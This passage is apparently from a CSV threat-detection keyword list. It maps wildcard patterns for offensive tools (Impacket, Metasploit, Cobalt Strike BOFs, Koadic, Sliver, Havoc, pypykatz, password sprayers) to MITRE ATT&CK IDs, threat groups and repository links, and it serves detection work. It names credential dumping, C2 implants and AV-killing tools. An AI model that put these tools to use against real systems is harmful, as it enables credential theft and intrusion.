menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-reg*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library,T1071.001 - T1071.002 - T1071.004 - T1071.005 ,TA0005 - TA0006,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,POST Exploitation tools,https://github.com/SecureAuthCorp/impacket,1,1,N/A,N/A,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketremcomsvc*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketrpcdatabase*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-rpcdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-samrdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketsecretsdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-secretsdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-secretsdump*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*impacketserviceinstall*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-services*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketsmbclient*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-smbclient*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-smbserver*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-ticketer*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacketutils*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impacket-wmiexec*,offensive_tool_keyword,AD exploitation cheat sheet,Command execution with WMI From Linux,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*impacket-wmiexec*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library,T1071.001 - T1071.002 - T1071.004 - T1071.005 ,TA0005 - TA0006,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,POST Exploitation tools,https://github.com/SecureAuthCorp/impacket,1,1,N/A,N/A,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ImpactDecoder*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ImpactPacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*impersonate_token *Administrator*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Incognito,10,10,N/A,N/A,N/A,N/A -*impersonate_token *BUILTIN\Administrators*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ImpersonateAndUnload.cpp*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,1,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*ImpersonateLocalService*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*ImpersonateLoggedOnUser*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*impersonateprocess.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*impersonateuser.boo*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*impersonateuser.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*imperva_gzip.py*,offensive_tool_keyword,Imperva_gzip_WAF_Bypass,Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. 
etc.,T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220,TA0001 - TA0002 - TA0003 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/BishopFox/Imperva_gzip_WAF_Bypass,1,1,N/A,N/A,2,146,29,2022-01-07T17:39:29Z,2022-01-07T17:38:33Z -*Implant*TeamServer.exe*,offensive_tool_keyword,VirusTotalC2,Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one,T1071.004 - T1102 - T1021.002,TA0011 - TA0008 - TA0042,N/A,N/A,C2,https://github.com/RATandC2/VirusTotalC2,1,1,N/A,10,10,5,81,2022-09-28T15:10:44Z,2022-09-28T15:12:42Z -*Implant.ImplantGenerator*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*implant.sleep-obf*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*implant/elevate/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/gather/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/inject/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/persist/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/pivot/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*implant/sliver/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*Implant\SleepMask*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*implant-callback.*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*ImplantSSP.csproj*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*import 
_eternalhush*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*import apypykatz*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*import BaseSprayModule*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*import DCSYNC*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*import DNSListener*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*import EnablePersistence*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*import 
eternalhush.*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*import IBurpExtender*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,0,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*import impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*import ImpactDecoder*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*import ImpactPacket*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*import LdapSearchBofParser*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - 